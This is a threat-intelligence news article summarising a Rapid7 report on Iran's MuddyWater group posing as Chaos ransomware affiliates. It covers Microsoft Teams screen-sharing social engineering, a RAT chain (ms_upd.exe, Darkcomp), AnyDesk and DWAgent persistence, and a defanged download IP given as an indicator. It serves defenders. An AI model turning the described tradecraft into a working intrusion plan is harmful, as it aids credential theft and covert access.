"The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," Rapid7 said in a report shared with The Hacker News.
MuddyWater's false-flag: state-backed actors posing as Chaos ransomware affiliates
Rapid7’s analysis, published to The Hacker News in early May 2026, attributes a recent intrusion to the Iranian state-sponsored cluster known as MuddyWater (also tracked as Mango Sandstorm, Seedworm, and Static Kitten). The operation presented itself as a typical ransomware-as-a-service (RaaS) intrusion tied to the Chaos gang, but investigators concluded it functioned as a targeted, state-backed campaign that leveraged extortion tradecraft to obscure strategic objectives.
Check Point had previously described similar behavior: in March it observed MuddyWater operators working through the cybercriminal ecosystem to mask strategic Iranian aims, including participation in affiliate programs and use of criminal ransomware brands such as Qilin. The same pattern — crimecraft as cover for state objectives — is central to Rapid7’s assessment of this intrusion.
Microsoft Teams social engineering and credential capture
Rapid7 reports the intrusion began with external chat requests via Microsoft Teams. Attackers initiated interactive screen-sharing sessions, impersonating support personnel, and used those sessions to harvest credentials and manipulate multi-factor authentication. While Chaos-affiliated incidents have used Teams for vishing and mail flooding, Rapid7’s incident shows the technique applied in a high-touch, human-led compromise that then pivoted to technical persistence.
During live sessions, the threat actor executed discovery commands, accessed VPN configuration files, and instructed users to put credentials into local text files. In at least one case the attacker deployed AnyDesk to extend access. Rapid7 also noted the use of Microsoft Quick Assist-like workflows in the broader Chaos playbook.
Malware chain and persistence: ms_upd.exe, Darkcomp (game.exe), and RAT behavior
Rapid7 mapped a multi-stage infection chain beginning with an executable downloaded over RDP: ms_upd.exe (aka Stagecomp). The executable gathers system information, contacts a command-and-control (C2) server, and drops subsequent payloads including game.exe (aka Darkcomp), WebView2Loader.dll, and visualwincomp.txt.
- game.exe (Darkcomp) is a bespoke remote access trojan (RAT) masquerading as a Microsoft WebView2 application and derived from the Microsoft WebView2APISample project.
- WebView2Loader.dll is a legitimate WebView2 DLL used to embed web content; visualwincomp.txt contains an encrypted configuration the RAT uses to locate C2 servers.
- The RAT polls its C2 every 60 seconds and can execute commands or PowerShell scripts, perform file operations, and spawn interactive cmd.exe or PowerShell shells.
Rapid7 also observed attackers establishing long-term persistence via remote management tools such as DWAgent and AnyDesk rather than executing file encryption. The absence of file encryption — despite Chaos artifacts — suggested the ransomware element served as obfuscation or a secondary lever, rather than the primary objective.
Attribution signals: shared tooling and a recurring code-signing certificate
Investigators tied the intrusion to MuddyWater in part through a reused code-signing certificate attributed to "Donald Gay," which signed ms_upd.exe. Rapid7 notes that the same certificate has previously been used by the threat cluster to sign other malware, including a CastleLoader downloader called Fakeset. Additional telemetry connects the actor to CastleRAT and Tsundere, and to past MuddyWater operations dating to 2020 and 2023 that involved loaders and destructive ransomware variants.
Rapid7 and other firms (Ctrl-Alt-Intel, Broadcom, Check Point, JUMPSEC) have documented a broader shift: state-aligned operators increasingly reusing off‑the‑shelf criminal tools and RaaS brands such as Chaos — active since early 2025 and advertised on forums like RAMP and RehubCom — to complicate attribution.
What this means for technologists, policymakers, and affected enterprises
Technologists and security teams will watch Teams-based social engineering and remote-access tooling closely: Rapid7’s case highlights interactive screen-sharing as a credential-exfiltration vector and flags DWAgent and AnyDesk as persistence mechanisms to detect. Indicators cited in the report include the ms_upd.exe download via curl from 172.86.126[.]208 and the reuse of the "Donald Gay" code-signing certificate.
Policymakers and regulators should note the blending of state objectives with criminal extortion playbooks: Check Point and Rapid7 both underscore how RaaS frameworks and affiliate programs can provide deniability and tactical cover for strategic operations, complicating response and attribution timelines.
Affected enterprises — particularly those in sectors already targeted by Chaos affiliates, including construction, manufacturing, and business services — should be aware that Chaos claimed 36 victims on its data leak site as of late March 2026, most in the U.S. Organizations dealing with VPN configurations and remote-support workflows should prioritize monitoring for credential capture during screen-sharing and unexpected deployments of remote management tools.
These findings underscore a growing convergence: state-aligned actors are borrowing criminal infrastructure and extortion narratives to obscure intent, while preserving human-led interaction techniques that can bypass automated defenses. The key open question Rapid7 leaves on the table is operational: when a ransomware artifact appears, will defenders focus on short-term impact or follow the persistence breadcrumbs — DWAgent, AnyDesk, bespoke RATs, and code-signing reuse — that reveal the true, strategic objective?
